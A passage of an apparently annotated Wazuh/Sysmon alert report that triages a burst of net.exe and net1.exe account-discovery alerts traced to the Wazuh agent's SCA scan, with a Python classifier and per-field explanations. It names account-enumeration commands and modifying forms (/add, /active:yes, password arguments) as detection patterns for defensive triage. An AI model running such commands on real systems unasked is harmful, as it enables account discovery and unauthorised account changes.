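    """Tokens after the net/net1 image, lower-cased: ('user', 'guest')."""
    return tuple(t.lower() for t in cmdline.split()[1:])


def is_modifying(cmdline):
    """True when the net command changes an account rather than reading it."""
    args = net_args(cmdline)
    if any(a.startswith(MODIFY_FLAGS) for a in args):
        return True
    # 'net user <name> <password>' sets a password with no flag at all
    return len(args) >= 3 and args[0] == "user" and not args[2].startswith("/")


def ancestry(rec, by_guid):
    """Image paths from this process up to the highest ancestor we can name."""
    images, cur, seen = [rec["image"]], rec, set()
    while cur["parent_guid"] not in seen:        # guards against GUID loops
        seen.add(cur["parent_guid"])
        parent = by_guid.get(cur["parent_guid"])
        if parent is None:                       # parent's EID 1 not in the set:
            images.append(cur["parent_image"])   # use the name Sysmon recorded
            break
        images.append(parent["image"])
        cur = parent
    return images


def classify(rec, by_guid):
    if is_modifying(rec["cmd"]):
        return "account-change"
    top = ancestry(rec, by_guid)[-1].lower()
    if (top.endswith("\\wazuh-agent.exe") and rec["user"] == SYSTEM
            and rec["cwd"].lower().startswith(AGENT_DIR)):
        return "likely-sca"
    if top.endswith(("\\net.exe", "\\net1.exe")):
        return "unresolved"
    return "investigate"


def triage(alerts):
    """Label every alert in the burst; returns {guid: label}."""
    by_guid = {a["guid"]: a for a in alerts}
    return {a["guid"]: classify(a, by_guid) for a in alerts}


def summary(alerts):
    """Counts per label, the number to look at before opening a case."""
    return dict(Counter(triage(alerts).values()))


if __name__ == "__main__":
    for guid, label in triage(ALERTS).items():
        print(f"{guid}: {label}")
    print(summary(ALERTS))
```

The "unresolved" label is the point worth keeping: the first net1.exe event on this page names net.exe as its parent, but that net.exe's own Process Create is not in this section, so nothing here proves who launched it. Fetch the parent event by parentProcessGuid before closing the alert; net.exe alone never tells you the operator.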

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Account enumeration with net user / net accounts is a standard first step after initial access, which is why the behaviour‑based score is ≥ 6. The mitigating context is that it runs as SYSTEM from the Wazuh agent's directory; decide whether it is the agent's own SCA scan before escalating.

🕒 2025-04-24T22:42:52.118+0000 | 🧠 MITRE: Discovery – Account Discovery [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

T1087 – Account Discovery
Parent check: wazuh-agent.exe (PID 3244) spawned net user guest as NT AUTHORITY\SYSTEM from the agent's own directory. That is the shape of a Wazuh SCA (CIS benchmark) check on the Guest account, not an operator at a keyboard.
Confirm on agent 001: look at the <sca> block in ossec.conf and its scan interval, check that the same net user / net accounts burst appears on other Windows agents on the same schedule, and verify the wazuh-agent.exe binary's signature and hash so a renamed or injected agent is not mistaken for the real one.
Scope: net user guest is read‑only. Escalate only if the burst is followed by account changes (net user ... /add or /active:yes, Security 4720/4722/4732) or by logons from the enumerated accounts.

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:52.118+0000
When the Wazuh manager raised the alert. The endpoint‑side time is data.win.system.systemTime, about eight seconds earlier here; line the alert up with other events using both.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  15
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534572.2312224
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means this is Sysmon telemetry, not the native Security log.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider. This is Sysmon's fixed provider ID; filter on it when the provider name is missing or localised.

data.win.system.eventID:  1
Event ID within the provider's channel. Sysmon 1 = Process Create, the Sysmon counterpart of Security 4688 with richer fields (hashes, parent command line, integrity level).

data.win.system.version:  5
Schema version of this event ID. Tells a parser which field set to expect.

data.win.system.level:  4
ETW level: 1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose. Sysmon Process Create is always 4, so this is not a severity signal.

data.win.system.task:  1
Task category within the provider. For Sysmon it equals the event type (1 = Process Create).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by the provider. Sysmon stamps this same value on every event, so it carries no signal here.

data.win.system.systemTime:  2025-04-24T22:42:43.9493907Z
UTC time the record was written to the channel (100‑ns precision). Use this, not the Wazuh timestamp, to order events on the endpoint; it is about 0.2 s after the net1.exe event above and eight seconds before the manager's timestamp.

data.win.system.eventRecordID:  291127
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the event – the Sysmon service itself, not the process being reported.

data.win.system.threadID:  4740
Thread in the Sysmon service that wrote the event. Rarely useful.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in. Export it with wevtutil epl if you need the original .evtx for forensics.

data.win.system.computer:  Attacker
Computer name as recorded by Windows. Should match agent.name; a mismatch means a renamed host or an agent enrolled under the wrong name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:43.946 ProcessGuid: {94294ddc-be63-680a-2f0c-000000000e00} ProcessId: 13660 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net user guest CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
Full rendered Sysmon message. Every data.win.eventdata field below is parsed out of it; read it once to confirm the parse matches.

data.win.eventdata.utcTime:  2025-04-24 22:42:43.946
Process creation time as seen by Sysmon (UTC, ms). A few ms before systemTime is normal.

data.win.eventdata.processGuid:  {94294ddc-be63-680a-2f0c-000000000e00}
Sysmon's globally unique ID for the new process. The net1.exe child that follows names this GUID as its parentProcessGuid; pivot on it to tie the pair together.

data.win.eventdata.processId:  13660
PID of the new process. PIDs are recycled, so prefer processGuid for pivots.

data.win.eventdata.image:  C:\Windows\SysWOW64\net.exe
Full path of the executable. net.exe is the launcher; it hands the user subcommand to net1.exe, so expect a child Process Create right after this one. SysWOW64 means the 32‑bit copy ran because the parent is the 32‑bit Wazuh agent.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
Version from the PE resource. 10.0.26100 is the Windows 11 24H2 / Server 2025 build line; a different patch level from net1.exe (.1) is normal.

data.win.eventdata.description:  Net Command
Description string from the PE version resource.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product name from the PE version resource. An empty or off‑brand value for a System32 binary is a red flag.

data.win.eventdata.company:  Microsoft Corporation
Company from the PE version resource. Free text, not a signature check.

data.win.eventdata.originalFileName:  net.exe
Internal name compiled into the binary. Compare with image: a mismatch means a renamed executable.

data.win.eventdata.commandLine:  net user guest
Exact command line. net user guest prints the Guest account's status (active or not, last logon, group membership). Read‑only: no password argument, no /add, no /active.

data.win.eventdata.currentDirectory:  C:\Program Files (x86)\ossec-agent\
Working directory of the new process. This is the Wazuh agent's own install directory, inherited from the parent below.

data.win.eventdata.user:  NT AUTHORITY\SYSTEM
Account the process runs as. SYSTEM means a service launched it, not an interactive user.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
GUID of the logon session. For user sessions, join it to Security 4624 to see how the session was created; the SYSTEM session has no useful logon event.

data.win.eventdata.logonId:  0x3e7
Logon session ID. 0x3E7 (999) is always the SYSTEM session created at boot.

data.win.eventdata.terminalSessionId:  0
Windows session number. 0 is the services session: no interactive desktop.

data.win.eventdata.integrityLevel:  System
Mandatory integrity level. System is the highest; Medium is a normal user, High an elevated admin.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
Hash of the image file as configured in Sysmon. Compare it with a known‑good copy of the same build or a reputation source; every net.exe launch in this burst carries this same hash.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
Sysmon GUID of the parent. Its timestamp segment (ea7f/ea88 rather than be63) shows the parent started long before this burst, consistent with a long‑running service.

data.win.eventdata.parentProcessId:  3244
PID of the parent process.

data.win.eventdata.parentImage:  C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
Executable of the parent. The Wazuh agent itself spawned net.exe, which is what a Security Configuration Assessment (SCA) policy check looks like, not an operator at a keyboard. Confirm by checking the agent's <sca> configuration and by verifying this binary's signature and hash; an attacker who replaced the agent or injected into it would look identical in this field.

data.win.eventdata.parentCommandLine:  "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
Command line of the parent. The service runs with no arguments, as installed.

data.win.eventdata.parentUser:  NT AUTHORITY\SYSTEM
Account the parent runs as.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Same case as the other net.exe alerts in this burst: verify the wazuh-agent.exe parent is the genuine agent running its SCA scan before closing; escalate if any instance has a different ancestry or is followed by account changes.

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Account enumeration with net user is a standard first step after initial access, which is why the behaviour‑based score is ≥ 6. This event is the net1.exe worker of the net user guest launch recorded just above, so it adds a second alert for one action.

🕒 2025-04-24T22:42:52.179+0000 | 🧠 MITRE: Discovery – Account Discovery [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

T1087 – Account Discovery
This is the net1.exe half of the net user guest pair: net.exe (PID 13660) hands the user subcommand to net1.exe, so this alert duplicates the preceding net.exe event rather than recording a new action.
Walk one hop further up: that net.exe's parent is wazuh-agent.exe (PID 3244) running as SYSTEM from the agent's directory, consistent with the agent's SCA scan. Confirm as for the parent event (SCA configuration on agent 001, same burst on other agents, agent binary signature).
If you tune this, tune on the net.exe event and suppress the net1.exe child only when its parentImage is net.exe, so the rule still fires for a net1.exe launched directly by anything else.

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:52.179+0000
When the Wazuh manager raised the alert. The endpoint‑side time is data.win.system.systemTime, about eight seconds earlier here; line the alert up with other events using both.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  16
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534572.2317475
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means this is Sysmon telemetry, not the native Security log.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider. This is Sysmon's fixed provider ID; filter on it when the provider name is missing or localised.

data.win.system.eventID:  1
Event ID within the provider's channel. Sysmon 1 = Process Create, the Sysmon counterpart of Security 4688 with richer fields (hashes, parent command line, integrity level).

data.win.system.version:  5
Schema version of this event ID. Tells a parser which field set to expect.

data.win.system.level:  4
ETW level: 1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose. Sysmon Process Create is always 4, so this is not a severity signal.

data.win.system.task:  1
Task category within the provider. For Sysmon it equals the event type (1 = Process Create).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by the provider. Sysmon stamps this same value on every event, so it carries no signal here.

data.win.system.systemTime:  2025-04-24T22:42:44.0502982Z
UTC time the record was written to the channel (100‑ns precision). Use this, not the Wazuh timestamp, to order events on the endpoint; it is about 0.1 s after the parent net.exe event, the usual launcher‑to‑worker gap.

data.win.system.eventRecordID:  291130
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the event – the Sysmon service itself, not the process being reported.

data.win.system.threadID:  4740
Thread in the Sysmon service that wrote the event. Rarely useful.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in. Export it with wevtutil epl if you need the original .evtx for forensics.

data.win.system.computer:  Attacker
Computer name as recorded by Windows. Should match agent.name; a mismatch means a renamed host or an agent enrolled under the wrong name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:44.044 ProcessGuid: {94294ddc-be64-680a-310c-000000000e00} ProcessId: 4256 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 user guest CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be63-680a-2f0c-000000000e00} ParentProcessId: 13660 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net user guest ParentUser: NT AUTHORITY\SYSTEM"
Full rendered Sysmon message. Every data.win.eventdata field below is parsed out of it; read it once to confirm the parse matches.

data.win.eventdata.utcTime:  2025-04-24 22:42:44.044
Process creation time as seen by Sysmon (UTC, ms). A few ms before systemTime is normal.

data.win.eventdata.processGuid:  {94294ddc-be64-680a-310c-000000000e00}
Sysmon's globally unique ID for the new process. Pivot on it to find this process's later events (network, file, DNS) even after the PID is reused.

data.win.eventdata.processId:  4256
PID of the new process. PIDs are recycled, so prefer processGuid for pivots.

data.win.eventdata.image:  C:\Windows\SysWOW64\net1.exe
Full path of the executable. net1.exe is the worker that net.exe hands the user subcommand to, so this is the second half of the net user guest pair. The command line says system32, but WOW64 file redirection resolved it to SysWOW64 because the whole chain is 32‑bit.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
Version from the PE resource. 10.0.26100 is the Windows 11 24H2 / Server 2025 build line.

data.win.eventdata.description:  Net Command
Description string from the PE version resource.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product name from the PE version resource. An empty or off‑brand value for a System32 binary is a red flag.

data.win.eventdata.company:  Microsoft Corporation
Company from the PE version resource. Free text, not a signature check.

data.win.eventdata.originalFileName:  net1.exe
Internal name compiled into the binary. Compare with image: a mismatch means a renamed executable.

data.win.eventdata.commandLine:  C:\WINDOWS\system32\net1 user guest
Exact command line. Same read‑only query the parent issued: Guest account status, last logon, group membership. No password argument, no /add, no /active.

data.win.eventdata.currentDirectory:  C:\Program Files (x86)\ossec-agent\
Working directory of the new process, inherited from net.exe and ultimately from the Wazuh agent that launched it.

data.win.eventdata.user:  NT AUTHORITY\SYSTEM
Account the process runs as. SYSTEM means a service launched it, not an interactive user.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
GUID of the logon session. Identical across the whole burst: every command ran in the same SYSTEM session.

data.win.eventdata.logonId:  0x3e7
Logon session ID. 0x3E7 (999) is always the SYSTEM session created at boot.

data.win.eventdata.terminalSessionId:  0
Windows session number. 0 is the services session: no interactive desktop.

data.win.eventdata.integrityLevel:  System
Mandatory integrity level. System is the highest; Medium is a normal user, High an elevated admin.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
Hash of the image file as configured in Sysmon. Same hash as the earlier net1.exe launch, so one binary; compare it with a known‑good copy of the same build.

data.win.eventdata.parentProcessGuid:  {94294ddc-be63-680a-2f0c-000000000e00}
Sysmon GUID of the parent. It matches the processGuid of the net user guest event recorded just above, which is how you tie the pair together.

data.win.eventdata.parentProcessId:  13660
PID of the parent process.

data.win.eventdata.parentImage:  C:\Windows\SysWOW64\net.exe
Executable of the parent. Only the launcher half of the pair; the ancestor that matters is net.exe's own parent, which the previous event shows to be wazuh-agent.exe.

data.win.eventdata.parentCommandLine:  net user guest
Command line of the parent. Same query as the child: net.exe forwards it to net1.exe unchanged.

data.win.eventdata.parentUser:  NT AUTHORITY\SYSTEM
Account the parent runs as.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Close together with the net.exe parent event (PID 13660) once that event's wazuh-agent.exe ancestry is confirmed as the agent's SCA scan; it is the same action seen twice.

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: net accounts reveals the local password and lockout policy, the information an attacker needs before a password spray, which is why the behaviour‑based score is ≥ 6. Here it runs as SYSTEM from the Wazuh agent, so decide whether it is the agent's own SCA scan before escalating.

🕒 2025-04-24T22:42:52.199+0000 | 🧠 MITRE: Discovery – Account Discovery [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

T1087 – Account Discovery
net accounts prints the local password and lockout policy (minimum length, maximum age, history, lockout threshold). Read‑only, but it tells an attacker how hard password spraying will be, so it belongs to the same discovery burst as the net user queries.
Parent is wazuh-agent.exe (PID 3244) as SYSTEM from the agent's directory, which matches what the CIS password‑policy checks in Wazuh's SCA do. Confirm via the <sca> configuration on agent 001 and its scan schedule, and verify the agent binary's signature and hash.
Escalate if the same enumeration appears under cmd.exe, powershell.exe or an interactive user, or if it is followed by Security 4740 lockouts or a spread of 4625 failures across accounts.

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:52.199+0000
When the Wazuh manager raised the alert. The endpoint‑side time is data.win.system.systemTime, about eight seconds earlier here; line the alert up with other events using both.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  25
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534572.2322552
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means this is Sysmon telemetry, not the native Security log.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider. This is Sysmon's fixed provider ID; filter on it when the provider name is missing or localised.

data.win.system.eventID:  1
Event ID within the provider's channel. Sysmon 1 = Process Create, the Sysmon counterpart of Security 4688 with richer fields (hashes, parent command line, integrity level).

data.win.system.version:  5
Schema version of this event ID. Tells a parser which field set to expect.

data.win.system.level:  4
ETW level: 1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose. Sysmon Process Create is always 4, so this is not a severity signal.

data.win.system.task:  1
Task category within the provider. For Sysmon it equals the event type (1 = Process Create).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by the provider. Sysmon stamps this same value on every event, so it carries no signal here.

data.win.system.systemTime:  2025-04-24T22:42:44.0939500Z
UTC time the record was written to the channel (100‑ns precision). Use this, not the Wazuh timestamp, to order events on the endpoint; the whole net user / net accounts burst spans well under a second, which is machine pacing, not a human typing.

data.win.system.eventRecordID:  291133
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the event – the Sysmon service itself, not the process being reported.

data.win.system.threadID:  4740
Thread in the Sysmon service that wrote the event. Rarely useful.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in. Export it with wevtutil epl if you need the original .evtx for forensics.

data.win.system.computer:  Attacker
Computer name as recorded by Windows. Should match agent.name; a mismatch means a renamed host or an agent enrolled under the wrong name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:44.091 ProcessGuid: {94294ddc-be64-680a-320c-000000000e00} ProcessId: 10704 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
Full rendered Sysmon message. Every data.win.eventdata field below is parsed out of it; read it once to confirm the parse matches.

data.win.eventdata.utcTime:  2025-04-24 22:42:44.091
Process creation time as seen by Sysmon (UTC, ms). A few ms before systemTime is normal.

data.win.eventdata.processGuid:  {94294ddc-be64-680a-320c-000000000e00}
Sysmon's globally unique ID for the new process. Pivot on it to find the net1.exe child and any later events for this process.

data.win.eventdata.processId:  10704
PID of the new process. PIDs are recycled, so prefer processGuid for pivots.

data.win.eventdata.image:  C:\Windows\SysWOW64\net.exe
Full path of the executable. net.exe launcher again; expect a net1.exe accounts child right after. SysWOW64 because the parent is the 32‑bit Wazuh agent.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
Version from the PE resource. 10.0.26100 is the Windows 11 24H2 / Server 2025 build line.

data.win.eventdata.description:  Net Command
Description string from the PE version resource.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product name from the PE version resource. An empty or off‑brand value for a System32 binary is a red flag.

data.win.eventdata.company:  Microsoft Corporation
Company from the PE version resource. Free text, not a signature check.

data.win.eventdata.originalFileName:  net.exe
Internal name compiled into the binary. Compare with image: a mismatch means a renamed executable.

data.win.eventdata.commandLine:  net.exe accounts
Exact command line. net accounts prints the local password and lockout policy. Read‑only; the modifying form takes switches such as /minpwlen or /lockoutthreshold, none of which appear here.

data.win.eventdata.currentDirectory:  C:\Program Files (x86)\ossec-agent\
Working directory of the new process. This is the Wazuh agent's own install directory, inherited from the parent below.

data.win.eventdata.user:  NT AUTHORITY\SYSTEM
Account the process runs as. SYSTEM means a service launched it, not an interactive user.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
GUID of the logon session. Identical across the whole burst: every command ran in the same SYSTEM session.

data.win.eventdata.logonId:  0x3e7
Logon session ID. 0x3E7 (999) is always the SYSTEM session created at boot.

data.win.eventdata.terminalSessionId:  0
Windows session number. 0 is the services session: no interactive desktop.

data.win.eventdata.integrityLevel:  System
Mandatory integrity level. System is the highest; Medium is a normal user, High an elevated admin.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
Hash of the image file as configured in Sysmon. Same hash as the earlier net.exe launch, so one binary; compare it with a known‑good copy of the same build.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
Sysmon GUID of the parent. Same parent GUID as the net user guest launch: one long‑running wazuh-agent.exe instance issued the whole burst.

data.win.eventdata.parentProcessId:  3244
PID of the parent process.

data.win.eventdata.parentImage:  C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
Executable of the parent. The Wazuh agent itself spawned net.exe, which is what an SCA policy check looks like. Confirm by checking the agent's <sca> configuration and verifying this binary's signature and hash; an attacker who replaced the agent or injected into it would look identical in this field.

data.win.eventdata.parentCommandLine:  "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
Command line of the parent. The service runs with no arguments, as installed.

data.win.eventdata.parentUser:  NT AUTHORITY\SYSTEM
Account the parent runs as.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Group with the net user administrator and net user guest events from the same wazuh-agent.exe parent (PID 3244) and confirm the SCA explanation once for the whole burst; if it holds, tune on parentImage plus SYSTEM plus the agent directory rather than on net.exe alone.

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Account enumeration via net.exe is a standard first step after initial access, which is why the behaviour‑based score is ≥ 6. Read this event with the burst it belongs to rather than in isolation.

🕒 2025-04-24T22:42:55.110+0000 | 🧠 MITRE: Discovery – Account Discovery [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

T1087 – Account Discovery
Pull the parentImage and parentProcessGuid of this event and walk the chain. If it ends at wazuh-agent.exe running as SYSTEM from C:\Program Files (x86)\ossec-agent\, group it with the SCA burst recorded at 22:42:43–44 above and close them together; if it ends anywhere else, treat it as live account discovery and pull the surrounding Sysmon 1 and 3 events for that logon session.

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:55.110+0000
When the Wazuh manager raised the alert. The endpoint‑side time is data.win.system.systemTime, a few seconds earlier; line the alert up with other events using both.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
